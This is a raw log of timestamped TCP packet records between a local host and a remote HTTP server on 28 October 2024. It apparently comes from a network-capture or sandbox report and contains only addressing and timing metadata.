                                                                                                                                                              Oct 28, 2024 19:46:22.309668064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309685946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309719086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.309818029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309834957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309853077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309863091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.309880018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.309895039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.309954882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310002089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310036898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310055017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310071945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310089111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310105085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310111046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310153961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310353994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310370922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310388088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310399055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310404062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310420990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310432911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310439110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310472965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310651064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310667038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310683966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310699940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310700893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310719013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310723066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310735941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310755014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310766935 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310796022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310950994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310973883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311001062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311017036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311021090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311034918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311049938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311063051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311068058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311109066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311499119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311515093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311530113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311538935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311542988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311554909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311570883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311574936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311587095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311599970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311604023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311620951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311631918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311639071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311655998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311671019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311675072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311688900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311698914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311707973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311728001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311981916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312024117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312053919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312071085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312151909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312238932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312257051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312273979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312290907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312299967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312326908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312391996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312417030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312433004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312448978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312459946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312465906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312483072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312490940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312500000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312515974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312520981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312532902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312566996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312825918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312840939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312859058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312871933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312901020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312968016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312984943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313000917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313018084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313025951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313056946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313237906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313255072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313271999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313288927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313297987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313307047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313323975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313333988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313345909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313363075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313379049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313406944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313589096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313606024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313643932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313728094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313744068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313786983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313858032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313874006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313890934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313908100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313915014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313925028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313949108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314037085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314080954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314131021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314147949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314163923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314179897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314186096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314197063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314213991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314220905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314232111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314250946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314254999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314266920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314284086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314296007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314321041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314585924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314651012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314677000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314699888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314771891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314800024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314824104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314826965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314855099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314876080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315052986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315080881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315108061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315116882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315135956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315150976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315162897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315188885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315207958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315215111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315241098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315262079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315268993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315325022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315459967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315485954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315512896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315532923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315538883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315584898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315732002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315758944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315784931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315808058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315812111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315840006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315855980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315880060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315906048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315922976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315944910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315972090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315989971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316004992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316030979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316049099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316056967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316083908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316112041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316117048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316157103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316168070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316324949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316349983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316374063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316375971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316401958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316423893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316428900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316456079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316477060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316482067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316507101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316529036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316534042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316582918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316631079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316668987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316700935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316715002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.316729069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.316776037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.521387100 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527131081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527194023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527230024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527249098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527286053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527335882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527348995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527384043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527421951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527436018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527515888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527565956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527569056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527601957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527636051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527653933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527690887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527724028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527736902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527760029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527793884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527808905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527827978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527861118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527864933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.527895927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527937889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.527946949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528084040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528116941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528130054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528151989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528184891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528201103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528218985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528253078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528271914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528301001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528333902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528347969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528373003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528428078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528487921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528521061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528554916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528564930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528589010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528623104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528630972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528656960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528691053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528707981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528724909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528773069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528784990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528808117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.528851032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.528975010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529007912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529041052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529048920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529074907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529109001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529113054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529141903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529175043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529185057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529210091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529242992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529254913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529279947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529314995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529326916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529454947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529489040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529506922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529524088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529556990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529575109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.529592037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.529624939 CET8049726166.1.160.211192.168.2.16
